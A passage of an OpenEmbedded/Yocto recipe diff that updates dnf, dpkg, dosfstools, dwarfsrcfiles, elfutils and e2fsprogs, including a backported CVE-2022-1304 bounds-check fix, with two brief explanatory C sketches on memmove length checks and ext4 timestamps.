+++ b/meta/recipes-devtools/dnf/dnf/0040-Keep-installed-packages-in-upgrade-job-RhBug-1728252.patch
@@ -0,0 +1,60 @@
+From c88a77198c0156e425c2725f30e481207de5162f Mon Sep 17 00:00:00 2001
+From: Jaroslav Mracek <jmracek@redhat.com>
+Date: Tue, 3 Sep 2019 11:01:51 +0200
+Subject: [PATCH] Keep installed packages in upgrade job
+ (RhBug:1728252,1644241,1741381)
+
+In combination with marking the job as TARGETED, this prevents
+reinstalling modified packages with the same NEVRA.
+
+https://bugzilla.redhat.com/show_bug.cgi?id=1728252
+https://bugzilla.redhat.com/show_bug.cgi?id=1644241
+https://bugzilla.redhat.com/show_bug.cgi?id=1741381
+
+Closes: #1474
+Approved by: m-blaha
+
+
+Backport to fix bug in dnf in oe-core
+from https://github.com/rpm-software-management/dnf
+
+Removed spec file portion of patch
+
+Upstream-Status: Backport
+Signed-off-by: Jate Sujjavanich <jatedev@gmail.com>
+---
+ dnf.spec | 4 ++--
+ dnf/base.py | 3 ---
+ dnf/module/module_base.py | 2 +-
+ 3 files changed, 3 insertions(+), 6 deletions(-)
+
+diff --git a/dnf/base.py b/dnf/base.py
+index b2ced61..628c154 100644
+--- a/dnf/base.py
++++ b/dnf/base.py
+@@ -1968,9 +1968,6 @@ class Base(object):
+ obsoletes=q.installed().union(q.upgrades()))
+ # add obsoletes into transaction
+ q = q.union(obsoletes)
+- # provide only available packages to solver otherwise selection of available
+- # possibilities will be ignored
+- q = q.available()
+ if reponame is not None:
+ q.filterm(reponame=reponame)
+ q = self._merge_update_filters(q, pkg_spec=pkg_spec)
+diff --git a/dnf/module/module_base.py b/dnf/module/module_base.py
+index 976d730..ce70f63 100644
+--- a/dnf/module/module_base.py
++++ b/dnf/module/module_base.py
+@@ -214,7 +214,7 @@ class ModuleBase(object):
+
+ if not upgrade_package_set:
+ logger.error(_("Unable to match profile in argument {}").format(spec))
+- query = self.base.sack.query().available().filterm(name=upgrade_package_set)
++ query = self.base.sack.query().filterm(name=upgrade_package_set)
+ if query:
+ sltr = dnf.selector.Selector(self.base.sack)
+ sltr.set(pkg=query)
+--
+2.7.4
+
diff --git a/meta/recipes-devtools/dnf/dnf_4.2.2.bb b/meta/recipes-devtools/dnf/dnf_4.2.2.bb
index a046ffc05d..6b6b233d6d 100644
--- a/meta/recipes-devtools/dnf/dnf_4.2.2.bb
+++ b/meta/recipes-devtools/dnf/dnf_4.2.2.bb
@@ -2,12 +2,13 @@ SUMMARY = "Package manager forked from Yum, using libsolv as a dependency resolv
DESCRIPTION = "Software package manager that installs, updates, and removes \
packages on RPM-based Linux distributions. It automatically computes \
dependencies and determines the actions required to install packages."
+HOMEPAGE = "https://github.com/rpm-software-management/dnf"
LICENSE = "GPLv2"
LIC_FILES_CHKSUM = "file://COPYING;md5=b234ee4d69f5fce4486a80fdaf4a4263 \
file://PACKAGE-LICENSING;md5=4a0548e303dbc77f067335b4d688e745 \
"
-SRC_URI = "git://github.com/rpm-software-management/dnf.git \
+SRC_URI = "git://github.com/rpm-software-management/dnf.git;branch=master;protocol=https \
file://0001-Corretly-install-tmpfiles.d-configuration.patch \
file://0001-Do-not-hardcode-etc-and-systemd-unit-directories.patch \
file://0005-Do-not-prepend-installroot-to-logdir.patch \
@@ -15,6 +16,7 @@ SRC_URI = "git://github.com/rpm-software-management/dnf.git \
file://0030-Run-python-scripts-using-env.patch \
file://Fix-SyntaxWarning.patch \
file://0001-set-python-path-for-completion_helper.patch \
+ file://0040-Keep-installed-packages-in-upgrade-job-RhBug-1728252.patch \
"
SRCREV = "9947306a55271b8b7c9e2b6e3b7d582885b6045d"
diff --git a/meta/recipes-devtools/dosfstools/dosfstools_4.1.bb b/meta/recipes-devtools/dosfstools/dosfstools_4.1.bb
index e4ab113391..4bd4aef099 100644
--- a/meta/recipes-devtools/dosfstools/dosfstools_4.1.bb
+++ b/meta/recipes-devtools/dosfstools/dosfstools_4.1.bb
@@ -22,7 +22,7 @@ EXTRA_OECONF = "--without-udev --enable-compat-symlinks"
CFLAGS += "-D_GNU_SOURCE -D_LARGEFILE_SOURCE -D_FILE_OFFSET_BITS=64"
-BBCLASSEXTEND = "native"
+BBCLASSEXTEND = "native nativesdk"
# Add codepage437 to avoid error from `dosfsck -l`
RRECOMMENDS_${PN}_append_libc-glibc = " glibc-gconv-ibm437"
diff --git a/meta/recipes-devtools/dpkg/dpkg.inc b/meta/recipes-devtools/dpkg/dpkg.inc
index 1c3c585d79..f008959d77 100644
--- a/meta/recipes-devtools/dpkg/dpkg.inc
+++ b/meta/recipes-devtools/dpkg/dpkg.inc
@@ -1,5 +1,7 @@
SUMMARY = "Package maintenance system from Debian"
LICENSE = "GPLv2.0+"
+HOMEPAGE = "https://salsa.debian.org/dpkg-team/dpkg"
+DESCRIPTION = "The primary interface for the dpkg suite is the dselect program. A more low-level and less user-friendly interface is available in the form of the dpkg command."
SECTION = "base"
DEPENDS = "zlib bzip2 perl ncurses"
diff --git a/meta/recipes-devtools/dpkg/dpkg_1.19.7.bb b/meta/recipes-devtools/dpkg/dpkg_1.19.8.bb
index e9dec337b3..9e6e9f2464 100644
--- a/meta/recipes-devtools/dpkg/dpkg_1.19.7.bb
+++ b/meta/recipes-devtools/dpkg/dpkg_1.19.8.bb
@@ -18,5 +18,5 @@ SRC_URI_append_class-native = " \
file://tweak-options-require-tar-1.27.patch \
"
-SRC_URI[md5sum] = "60f57c5494e6dfa177504d47bfa0e383"
-SRC_URI[sha256sum] = "4c27fededf620c0aa522fff1a48577ba08144445341257502e7730f2b1a296e8"
+SRC_URI[md5sum] = "9d170c8baa1aa36b09698c909f304508"
+SRC_URI[sha256sum] = "2632c00b0cf0ea19ed7bd6700e6ec5faca93f0045af629d356dc03ad74ae6f10"
diff --git a/meta/recipes-devtools/dwarfsrcfiles/dwarfsrcfiles.bb b/meta/recipes-devtools/dwarfsrcfiles/dwarfsrcfiles.bb
index 2c843a9342..56b52d6a47 100644
--- a/meta/recipes-devtools/dwarfsrcfiles/dwarfsrcfiles.bb
+++ b/meta/recipes-devtools/dwarfsrcfiles/dwarfsrcfiles.bb
@@ -1,4 +1,5 @@
SUMMARY = "A small utility for printing debug source file locations embedded in binaries"
+DESCRIPTION = "${SUMMARY}"
LICENSE = "GPLv2+"
LIC_FILES_CHKSUM = "file://../dwarfsrcfiles.c;md5=31483894e453a77acbb67847565f1b5c;beginline=1;endline=8"
diff --git a/meta/recipes-devtools/dwarfsrcfiles/files/dwarfsrcfiles.c b/meta/recipes-devtools/dwarfsrcfiles/files/dwarfsrcfiles.c
index af7af524eb..9eb5ca807a 100644
--- a/meta/recipes-devtools/dwarfsrcfiles/files/dwarfsrcfiles.c
+++ b/meta/recipes-devtools/dwarfsrcfiles/files/dwarfsrcfiles.c
@@ -9,6 +9,7 @@
#include <argp.h>
#include <stdio.h>
+#include <stdlib.h>
#include <dwarf.h>
#include <elfutils/libdw.h>
@@ -83,13 +84,15 @@ process_cu (Dwarf_Die *cu_die)
int
main (int argc, char **argv)
{
- char* args[3];
+ char* args[5];
int res = 0;
Dwfl *dwfl;
Dwarf_Addr bias;
- if (argc != 2)
+ if (argc != 2) {
fprintf(stderr, "Usage %s <file>", argv[0]);
+ exit(EXIT_FAILURE);
+ }
// Pretend "dwarfsrcfiles -e <file>" was given, so we can use standard
// dwfl argp parser to open the file for us and get our Dwfl. Useful
@@ -98,8 +101,12 @@ main (int argc, char **argv)
args[0] = argv[0];
args[1] = "-e";
args[2] = argv[1];
+ // We don't want to follow debug-linked files: due to the way OE processes
+ // files, doing so could race against changes in the linked binary (e.g. objcopy on it)
+ args[3] = "--debuginfo-path";
+ args[4] = "/not/exist";
- argp_parse (dwfl_standard_argp (), 3, args, 0, NULL, &dwfl);
+ argp_parse (dwfl_standard_argp (), 5, args, 0, NULL, &dwfl);
Dwarf_Die *cu = NULL;
while ((cu = dwfl_nextcu (dwfl, cu, &bias)) != NULL)
diff --git a/meta/recipes-devtools/e2fsprogs/e2fsprogs.inc b/meta/recipes-devtools/e2fsprogs/e2fsprogs.inc
index 009f5ed807..57e4665a34 100644
--- a/meta/recipes-devtools/e2fsprogs/e2fsprogs.inc
+++ b/meta/recipes-devtools/e2fsprogs/e2fsprogs.inc
@@ -3,7 +3,7 @@ DESCRIPTION = "The Ext2 Filesystem Utilities (e2fsprogs) contain all of the stan
fixing, configuring , and debugging ext2 filesystems."
HOMEPAGE = "http://e2fsprogs.sourceforge.net/"
-LICENSE = "GPLv2 & LGPLv2 & BSD & MIT"
+LICENSE = "GPLv2 & LGPLv2 & BSD-3-Clause & MIT"
LICENSE_e2fsprogs-dumpe2fs = "GPLv2"
LICENSE_e2fsprogs-e2fsck = "GPLv2"
LICENSE_e2fsprogs-mke2fs = "GPLv2"
@@ -19,7 +19,7 @@ LIC_FILES_CHKSUM = "file://NOTICE;md5=d50be0580c0b0a7fbc7a4830bbe6c12b \
SECTION = "base"
DEPENDS = "util-linux attr"
-SRC_URI = "git://git.kernel.org/pub/scm/fs/ext2/e2fsprogs.git"
+SRC_URI = "git://git.kernel.org/pub/scm/fs/ext2/e2fsprogs.git;branch=master"
S = "${WORKDIR}/git"
inherit autotools gettext texinfo pkgconfig multilib_header update-alternatives ptest
diff --git a/meta/recipes-devtools/e2fsprogs/e2fsprogs/0001-e2fsck-don-t-try-to-rehash-a-deleted-directory.patch b/meta/recipes-devtools/e2fsprogs/e2fsprogs/0001-e2fsck-don-t-try-to-rehash-a-deleted-directory.patch
deleted file mode 100644
index ba4e3a3c97..0000000000
--- a/meta/recipes-devtools/e2fsprogs/e2fsprogs/0001-e2fsck-don-t-try-to-rehash-a-deleted-directory.patch
+++ /dev/null
@@ -1,49 +0,0 @@
-From 71ba13755337e19c9a826dfc874562a36e1b24d3 Mon Sep 17 00:00:00 2001
-From: Theodore Ts'o <tytso@mit.edu>
-Date: Thu, 19 Dec 2019 19:45:06 -0500
-Subject: [PATCH] e2fsck: don't try to rehash a deleted directory
-
-If directory has been deleted in pass1[bcd] processing, then we
-shouldn't try to rehash the directory in pass 3a when we try to
-rehash/reoptimize directories.
-
-Signed-off-by: Theodore Ts'o <tytso@mit.edu>
-
-Upstream-Status: Backport [https://git.kernel.org/pub/scm/fs/ext2/e2fsprogs.git/commit/?id=71ba13755337e19c9a826dfc874562a36e1b24d3]
-Signed-off-by: Anuj Mittal <anuj.mittal@intel.com>
----
- e2fsck/pass1b.c | 4 ++++
- e2fsck/rehash.c | 2 ++
- 2 files changed, 6 insertions(+)
-
-diff --git a/e2fsck/pass1b.c b/e2fsck/pass1b.c
-index 5693b9cf..bca701ca 100644
---- a/e2fsck/pass1b.c
-+++ b/e2fsck/pass1b.c
-@@ -705,6 +705,10 @@ static void delete_file(e2fsck_t ctx, ext2_ino_t ino,
- fix_problem(ctx, PR_1B_BLOCK_ITERATE, &pctx);
- if (ctx->inode_bad_map)
- ext2fs_unmark_inode_bitmap2(ctx->inode_bad_map, ino);
-+ if (ctx->inode_reg_map)
-+ ext2fs_unmark_inode_bitmap2(ctx->inode_reg_map, ino);
-+ ext2fs_unmark_inode_bitmap2(ctx->inode_dir_map, ino);
-+ ext2fs_unmark_inode_bitmap2(ctx->inode_used_map, ino);
- ext2fs_inode_alloc_stats2(fs, ino, -1, LINUX_S_ISDIR(dp->inode.i_mode));
- quota_data_sub(ctx->qctx, &dp->inode, ino,
- pb.dup_blocks * fs->blocksize);
-diff --git a/e2fsck/rehash.c b/e2fsck/rehash.c
-index 3dd1e941..2c908be0 100644
---- a/e2fsck/rehash.c
-+++ b/e2fsck/rehash.c
-@@ -1028,6 +1028,8 @@ void e2fsck_rehash_directories(e2fsck_t ctx)
- if (!ext2fs_u32_list_iterate(iter, &ino))
- break;
- }
-+ if (!ext2fs_test_inode_bitmap2(ctx->inode_dir_map, ino))
-+ continue;
-
- pctx.dir = ino;
- if (first) {
---
-2.24.1
-
diff --git a/meta/recipes-devtools/e2fsprogs/e2fsprogs/0001-misc-create_inode.c-set-dir-s-mode-correctly.patch b/meta/recipes-devtools/e2fsprogs/e2fsprogs/0001-misc-create_inode.c-set-dir-s-mode-correctly.patch
deleted file mode 100644
index fc4a540986..0000000000
--- a/meta/recipes-devtools/e2fsprogs/e2fsprogs/0001-misc-create_inode.c-set-dir-s-mode-correctly.patch
+++ /dev/null
@@ -1,41 +0,0 @@
-From f6d188580c2c9599319076fee22f2424652c711c Mon Sep 17 00:00:00 2001
-From: Robert Yang <liezhi.yang@windriver.com>
-Date: Wed, 13 Sep 2017 19:55:35 -0700
-Subject: [PATCH] misc/create_inode.c: set dir's mode correctly
-
-The dir's mode has been set by ext2fs_mkdir() with umask, so
-reset it to the source's mode in set_inode_extra().
-
-Fixed when source dir's mode is 521, but tarball would be 721, this was
-incorrect.
-
-Upstream-Status: Submitted
-
-Signed-off-by: Robert Yang <liezhi.yang@windriver.com>
----
- misc/create_inode.c | 9 ++++++++-
- 1 file changed, 8 insertions(+), 1 deletion(-)
-
-diff --git a/misc/create_inode.c b/misc/create_inode.c
-index 8ce3faf..50fbaa8 100644
---- a/misc/create_inode.c
-+++ b/misc/create_inode.c
-@@ -116,7 +116,14 @@ static errcode_t set_inode_extra(ext2_filsys fs, ext2_ino_t ino,
-
- inode.i_uid = st->st_uid;
- inode.i_gid = st->st_gid;
-- inode.i_mode |= st->st_mode;
-+ /*
-+ * The dir's mode has been set by ext2fs_mkdir() with umask, so
-+ * reset it to the source's mode
-+ */
-+ if S_ISDIR(st->st_mode)
-+ inode.i_mode = LINUX_S_IFDIR | st->st_mode;
-+ else
-+ inode.i_mode |= st->st_mode;
- inode.i_atime = st->st_atime;
- inode.i_mtime = st->st_mtime;
- inode.i_ctime = st->st_ctime;
---
-2.10.2
-
diff --git a/meta/recipes-devtools/e2fsprogs/e2fsprogs/CVE-2019-5188.patch b/meta/recipes-devtools/e2fsprogs/e2fsprogs/CVE-2019-5188.patch
deleted file mode 100644
index de4bce0037..0000000000
--- a/meta/recipes-devtools/e2fsprogs/e2fsprogs/CVE-2019-5188.patch
+++ /dev/null
@@ -1,57 +0,0 @@
-From 8dd73c149f418238f19791f9d666089ef9734dff Mon Sep 17 00:00:00 2001
-From: Theodore Ts'o <tytso@mit.edu>
-Date: Thu, 19 Dec 2019 19:37:34 -0500
-Subject: [PATCH] e2fsck: abort if there is a corrupted directory block when
- rehashing
-
-In e2fsck pass 3a, when we are rehashing directories, at least in
-theory, all of the directories should have had corruptions with
-respect to directory entry structure fixed. However, it's possible
-(for example, if the user declined a fix) that we can reach this stage
-of processing with a corrupted directory entries.
-
-So check for that case and don't try to process a corrupted directory
-block so we don't run into trouble in mutate_name() if there is a
-zero-length file name.
-
-Addresses: TALOS-2019-0973
-Addresses: CVE-2019-5188
-Signed-off-by: Theodore Ts'o <tytso@mit.edu>
-
-CVE: CVE-2019-5188
-Signed-off-by: Anuj Mittal <anuj.mittal@intel.com>
-Upstream-Status: Backport [https://git.kernel.org/pub/scm/fs/ext2/e2fsprogs.git/commit/?id=8dd73c149f418238f19791f9d666089ef9734dff]
----
- e2fsck/rehash.c | 9 +++++++++
- 1 file changed, 9 insertions(+)
-
-diff --git a/e2fsck/rehash.c b/e2fsck/rehash.c
-index a5fc1be1..3dd1e941 100644
---- a/e2fsck/rehash.c
-+++ b/e2fsck/rehash.c
-@@ -160,6 +160,10 @@ static int fill_dir_block(ext2_filsys fs,
- dir_offset += rec_len;
- if (dirent->inode == 0)
- continue;
-+ if ((name_len) == 0) {
-+ fd->err = EXT2_ET_DIR_CORRUPTED;
-+ return BLOCK_ABORT;
-+ }
- if (!fd->compress && (name_len == 1) &&
- (dirent->name[0] == '.'))
- continue;
-@@ -401,6 +405,11 @@ static int duplicate_search_and_fix(e2fsck_t ctx, ext2_filsys fs,
- continue;
- }
- new_len = ext2fs_dirent_name_len(ent->dir);
-+ if (new_len == 0) {
-+ /* should never happen */
-+ ext2fs_unmark_valid(fs);
-+ continue;
-+ }
- memcpy(new_name, ent->dir->name, new_len);
- mutate_name(new_name, &new_len);
- for (j=0; j < fd->num_array; j++) {
---
-2.24.1
-
diff --git a/meta/recipes-devtools/e2fsprogs/e2fsprogs/CVE-2022-1304.patch b/meta/recipes-devtools/e2fsprogs/e2fsprogs/CVE-2022-1304.patch
new file mode 100644
index 0000000000..34e2567b25
--- /dev/null
+++ b/meta/recipes-devtools/e2fsprogs/e2fsprogs/CVE-2022-1304.patch
@@ -0,0 +1,42 @@
+From a66071ed6a0d1fa666d22dcb78fa6fcb3bf22df3 Mon Sep 17 00:00:00 2001
+From: Hitendra Prajapati <hprajapati@mvista.com>
+Date: Fri, 27 May 2022 14:01:50 +0530
+Subject: [PATCH] CVE-2022-1304
+
+Upstream-Status: Backport [https://git.kernel.org/pub/scm/fs/ext2/e2fsprogs.git/commit/?h=maint&id=ab51d587bb9b229b1fade1afd02e1574c1ba5c76]
+CVE: CVE-2022-1304
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+
+---
+ lib/ext2fs/extent.c | 8 ++++++++
+ 1 file changed, 8 insertions(+)
+
+diff --git a/lib/ext2fs/extent.c b/lib/ext2fs/extent.c
+index ac3dbfec9..a1b1905cd 100644
+--- a/lib/ext2fs/extent.c
++++ b/lib/ext2fs/extent.c
+@@ -495,6 +495,10 @@ retry:
+ ext2fs_le16_to_cpu(eh->eh_entries);
+ newpath->max_entries = ext2fs_le16_to_cpu(eh->eh_max);
+
++ /* Make sure there is at least one extent present */
++ if (newpath->left <= 0)
++ return EXT2_ET_EXTENT_NO_DOWN;
++
+ if (path->left > 0) {
+ ix++;
+ newpath->end_blk = ext2fs_le32_to_cpu(ix->ei_block);
+@@ -1630,6 +1634,10 @@ errcode_t ext2fs_extent_delete(ext2_extent_handle_t handle, int flags)
+
+ cp = path->curr;
+
++ /* Sanity check before memmove() */
++ if (path->left < 0)
++ return EXT2_ET_EXTENT_LEAF_BAD;
++
+ if (path->left) {
+ memmove(cp, cp + sizeof(struct ext3_extent_idx),
+ path->left * sizeof(struct ext3_extent_idx));
+--
+2.25.1
+
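The sanity checks added above guard the length passed to memmove(): path->left is a signed count, and a negative value converted to size_t becomes an enormous length. A standalone C sketch of that conversion hazard (the values are illustrative, not taken from the extent code):

#include <stdio.h>
#include <string.h>

int main(void)
{
    int left = -1;                          /* e.g. a corrupted on-disk count */
    size_t n = (size_t) left * sizeof(int); /* converts/wraps to a huge number */

    printf("left = %d, memmove length would be %zu bytes\n", left, n);

    /* The fix is to validate the signed count before calling memmove():
       if (left < 0) return error; */
    char buf[16] = "0123456789abcde";
    if (left > 0)
        memmove(buf, buf + 1, (size_t) left);
    return 0;
}
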
diff --git a/meta/recipes-devtools/e2fsprogs/e2fsprogs/big-inodes-for-small-fs.patch b/meta/recipes-devtools/e2fsprogs/e2fsprogs/big-inodes-for-small-fs.patch
new file mode 100644
index 0000000000..caeb560d32
--- /dev/null
+++ b/meta/recipes-devtools/e2fsprogs/e2fsprogs/big-inodes-for-small-fs.patch
@@ -0,0 +1,22 @@
+Ensure "small" file systems also have the default inode size (256 bytes) so that
+they can store 64-bit timestamps and work past 2038.
+
+The "small" type is any size >3MB and <512MB, which covers a lot of relatively
+small filesystems built by OE, especially when they're sized to fit the contents
+and expand to the storage on boot.
+
+Upstream-Status: Inappropriate
+Signed-off-by: Ross Burton <ross.burton@arm.com>
+
+diff --git a/misc/mke2fs.conf.in b/misc/mke2fs.conf.in
+index 01e35cf8..29f41dc0 100644
+--- a/misc/mke2fs.conf.in
++++ b/misc/mke2fs.conf.in
+@@ -16,7 +16,6 @@
+ }
+ small = {
+ blocksize = 1024
+- inode_size = 128
+ inode_ratio = 4096
+ }
+ floppy = {
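A rough sketch of why the 256-byte inode matters for the 2038 limit: the larger inode has room for the extra timestamp words whose low two bits extend the 32-bit seconds field (ext4's extended timestamp encoding, simplified here; the remaining 30 bits carry nanoseconds and the real decoding has further corner cases):

#include <stdint.h>
#include <stdio.h>

/* Simplified decoding of an ext4 extended timestamp: the low two bits of
   the *_extra word extend the 32-bit seconds field to 34 bits. */
static int64_t decode_seconds(int32_t base, uint32_t extra)
{
    return (int64_t) base + ((int64_t)(extra & 3) << 32);
}

int main(void)
{
    /* 0x7FFFFFFF is the last second representable in a plain 32-bit field
       (January 2038); one extra epoch bit pushes the range far beyond it. */
    printf("32-bit limit: %lld\n", (long long) decode_seconds(INT32_MAX, 0));
    printf("with one extra epoch bit: %lld\n", (long long) decode_seconds(0, 1));
    return 0;
}
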
diff --git a/meta/recipes-devtools/e2fsprogs/e2fsprogs/e2fsck-fix-use-after-free-in-calculate_tree.patch b/meta/recipes-devtools/e2fsprogs/e2fsprogs/e2fsck-fix-use-after-free-in-calculate_tree.patch
deleted file mode 100644
index 342a2b855b..0000000000
--- a/meta/recipes-devtools/e2fsprogs/e2fsprogs/e2fsck-fix-use-after-free-in-calculate_tree.patch
+++ /dev/null
@@ -1,76 +0,0 @@
-From: Wang Shilong <wshilong@ddn.com>
-Date: Mon, 30 Dec 2019 19:52:39 -0500
-Subject: e2fsck: fix use after free in calculate_tree()
-
-The problem is alloc_blocks() will call get_next_block() which might
-reallocate outdir->buf, and memory address could be changed after
-this. To fix this, pointers that point into outdir->buf, such as
-int_limit and root need to be recaulated based on the new starting
-address of outdir->buf.
-
-[ Changed to correctly recalculate int_limit, and to optimize how we
- reallocate outdir->buf. -TYT ]
-
-Addresses-Debian-Bug: 948517
-Signed-off-by: Wang Shilong <wshilong@ddn.com>
-Signed-off-by: Theodore Ts'o <tytso@mit.edu>
-(cherry picked from commit 101e73e99ccafa0403fcb27dd7413033b587ca01)
-
-Signed-off-by: Anuj Mittal <anuj.mittal@intel.com>
-Upstream-Status: Backport [https://git.kernel.org/pub/scm/fs/ext2/e2fsprogs.git/commit/?id=101e73e99ccafa0403fcb27dd7413033b587ca01]
----
- e2fsck/rehash.c | 17 ++++++++++++++++-
- 1 file changed, 16 insertions(+), 1 deletion(-)
-
-diff --git a/e2fsck/rehash.c b/e2fsck/rehash.c
-index 0a5888a9..2574e151 100644
---- a/e2fsck/rehash.c
-+++ b/e2fsck/rehash.c
-@@ -295,7 +295,11 @@ static errcode_t get_next_block(ext2_filsys fs, struct out_dir *outdir,
- errcode_t retval;
-
- if (outdir->num >= outdir->max) {
-- retval = alloc_size_dir(fs, outdir, outdir->max + 50);
-+ int increment = outdir->max / 10;
-+
-+ if (increment < 50)
-+ increment = 50;
-+ retval = alloc_size_dir(fs, outdir, outdir->max + increment);
- if (retval)
- return retval;
- }
-@@ -637,6 +641,9 @@ static int alloc_blocks(ext2_filsys fs,
- if (retval)
- return retval;
-
-+ /* outdir->buf might be reallocated */
-+ *prev_ent = (struct ext2_dx_entry *) (outdir->buf + *prev_offset);
-+
- *next_ent = set_int_node(fs, block_start);
- *limit = (struct ext2_dx_countlimit *)(*next_ent);
- if (next_offset)
-@@ -726,6 +733,9 @@ static errcode_t calculate_tree(ext2_filsys fs,
- return retval;
- }
- if (c3 == 0) {
-+ int delta1 = (char *)int_limit - outdir->buf;
-+ int delta2 = (char *)root - outdir->buf;
-+
- retval = alloc_blocks(fs, &limit, &int_ent,
- &dx_ent, &int_offset,
- NULL, outdir, i, &c2,
-@@ -733,6 +743,11 @@ static errcode_t calculate_tree(ext2_filsys fs,
- if (retval)
- return retval;
-
-+ /* outdir->buf might be reallocated */
-+ int_limit = (struct ext2_dx_countlimit *)
-+ (outdir->buf + delta1);
-+ root = (struct ext2_dx_entry *)
-+ (outdir->buf + delta2);
- }
- dx_ent->block = ext2fs_cpu_to_le32(i);
- if (c3 != limit->limit)
---
-2.24.1
-
diff --git a/meta/recipes-devtools/e2fsprogs/e2fsprogs/e2fsprogs-fix-missing-check-for-permission-denied.patch b/meta/recipes-devtools/e2fsprogs/e2fsprogs/e2fsprogs-fix-missing-check-for-permission-denied.patch
index 4d335af4cf..284ac90196 100644
--- a/meta/recipes-devtools/e2fsprogs/e2fsprogs/e2fsprogs-fix-missing-check-for-permission-denied.patch
+++ b/meta/recipes-devtools/e2fsprogs/e2fsprogs/e2fsprogs-fix-missing-check-for-permission-denied.patch
@@ -1,4 +1,4 @@
-From e8331a76983e839a3d193446ab8ae9c1b09daa07 Mon Sep 17 00:00:00 2001
+From b55dfb4b62e507ae4f0814aec7597b56f9d6292a Mon Sep 17 00:00:00 2001
From: Jackie Huang <jackie.huang@windriver.com>
Date: Wed, 10 Aug 2016 11:19:44 +0800
Subject: [PATCH] Fix missing check for permission denied.
diff --git a/meta/recipes-devtools/e2fsprogs/e2fsprogs/quiet-debugfs.patch b/meta/recipes-devtools/e2fsprogs/e2fsprogs/quiet-debugfs.patch
index 95e6a7a2d5..aac88eed98 100644
--- a/meta/recipes-devtools/e2fsprogs/e2fsprogs/quiet-debugfs.patch
+++ b/meta/recipes-devtools/e2fsprogs/e2fsprogs/quiet-debugfs.patch
@@ -1,4 +1,4 @@
-From de6d6f0dd010f5b9d917553acb9430278f448f23 Mon Sep 17 00:00:00 2001
+From 9aa68ad81b97847dda3493145f4b0a7cc580c551 Mon Sep 17 00:00:00 2001
From: Ross Burton <ross.burton@intel.com>
Date: Mon, 23 Dec 2013 13:38:34 +0000
Subject: [PATCH] e2fsprogs: silence debugfs
diff --git a/meta/recipes-devtools/e2fsprogs/e2fsprogs/run-ptest b/meta/recipes-devtools/e2fsprogs/e2fsprogs/run-ptest
index c97c0377e9..279923db8e 100644
--- a/meta/recipes-devtools/e2fsprogs/e2fsprogs/run-ptest
+++ b/meta/recipes-devtools/e2fsprogs/e2fsprogs/run-ptest
@@ -8,3 +8,4 @@ rm -f *.tmp
rm -f *.ok
rm -f *.failed
rm -f *.log
+cp ../data/test_data.tmp ./
diff --git a/meta/recipes-devtools/e2fsprogs/e2fsprogs_1.45.4.bb b/meta/recipes-devtools/e2fsprogs/e2fsprogs_1.45.7.bb
index 4f7cafeac9..565c433866 100644
--- a/meta/recipes-devtools/e2fsprogs/e2fsprogs_1.45.4.bb
+++ b/meta/recipes-devtools/e2fsprogs/e2fsprogs_1.45.7.bb
@@ -4,19 +4,17 @@ SRC_URI += "file://remove.ldconfig.call.patch \
file://run-ptest \
file://ptest.patch \
file://mkdir_p.patch \
- file://0001-misc-create_inode.c-set-dir-s-mode-correctly.patch \
file://0001-configure.ac-correct-AM_GNU_GETTEXT.patch \
file://0001-intl-do-not-try-to-use-gettext-defines-that-no-longe.patch \
- file://CVE-2019-5188.patch \
- file://0001-e2fsck-don-t-try-to-rehash-a-deleted-directory.patch \
- file://e2fsck-fix-use-after-free-in-calculate_tree.patch \
+ file://CVE-2022-1304.patch \
"
SRC_URI_append_class-native = " file://e2fsprogs-fix-missing-check-for-permission-denied.patch \
file://quiet-debugfs.patch \
+ file://big-inodes-for-small-fs.patch \
"
-SRCREV = "984ff8d6a0a1d5dc300505f67b38ed5047d51dac"
+SRCREV = "5403970e44241cec26f98aaa0124b9881b4bbf4f"
UPSTREAM_CHECK_GITTAGREGEX = "v(?P<pver>\d+\.\d+(\.\d+)*)$"
EXTRA_OECONF += "--libdir=${base_libdir} --sbindir=${base_sbindir} \
@@ -56,6 +54,7 @@ do_install () {
oe_multilib_header ext2fs/ext2_types.h
install -d ${D}${base_bindir}
mv ${D}${bindir}/chattr ${D}${base_bindir}/chattr.e2fsprogs
+ mv ${D}${bindir}/lsattr ${D}${base_bindir}/lsattr.e2fsprogs
install -v -m 755 ${S}/contrib/populate-extfs.sh ${D}${base_sbindir}/
@@ -104,10 +103,12 @@ FILES_libe2p = "${base_libdir}/libe2p.so.*"
FILES_libext2fs = "${libdir}/e2initrd_helper ${base_libdir}/libext2fs.so.*"
FILES_${PN}-dev += "${datadir}/*/*.awk ${datadir}/*/*.sed ${base_libdir}/*.so ${bindir}/compile_et ${bindir}/mk_cmds"
-ALTERNATIVE_${PN} = "chattr"
+ALTERNATIVE_${PN} = "chattr lsattr"
ALTERNATIVE_PRIORITY = "100"
ALTERNATIVE_LINK_NAME[chattr] = "${base_bindir}/chattr"
ALTERNATIVE_TARGET[chattr] = "${base_bindir}/chattr.e2fsprogs"
+ALTERNATIVE_LINK_NAME[lsattr] = "${base_bindir}/lsattr"
+ALTERNATIVE_TARGET[lsattr] = "${base_bindir}/lsattr.e2fsprogs"
ALTERNATIVE_${PN}-doc = "fsck.8"
ALTERNATIVE_LINK_NAME[fsck.8] = "${mandir}/man8/fsck.8"
@@ -128,6 +129,8 @@ do_compile_ptest() {
}
do_install_ptest() {
+	# This file's permissions depend on the host umask, so make them deterministic
+ chmod 0644 ${B}/tests/test_data.tmp
cp -R --no-dereference --preserve=mode,links -v ${B}/tests ${D}${PTEST_PATH}/test
cp -R --no-dereference --preserve=mode,links -v ${S}/tests/* ${D}${PTEST_PATH}/test
sed -e 's!../e2fsck/e2fsck!e2fsck!g' \
@@ -141,4 +144,7 @@ do_install_ptest() {
install -d ${D}${PTEST_PATH}/lib
install -m 0644 ${B}/lib/config.h ${D}${PTEST_PATH}/lib/
+
+ install -d ${D}${PTEST_PATH}/data
+ install -m 0644 ${B}/tests/test_data.tmp ${D}${PTEST_PATH}/data/
}
diff --git a/meta/recipes-devtools/elfutils/elfutils_0.178.bb b/meta/recipes-devtools/elfutils/elfutils_0.178.bb
index c500ae3c19..29a3bbfffb 100644
--- a/meta/recipes-devtools/elfutils/elfutils_0.178.bb
+++ b/meta/recipes-devtools/elfutils/elfutils_0.178.bb
@@ -1,5 +1,6 @@
SUMMARY = "Utilities and libraries for handling compiled object files"
HOMEPAGE = "https://sourceware.org/elfutils"
+DESCRIPTION = "elfutils is a collection of utilities and libraries to read, create and modify ELF binary files, find and handle DWARF debug data, symbols, thread state and stacktraces for processes and core files on GNU/Linux."
SECTION = "base"
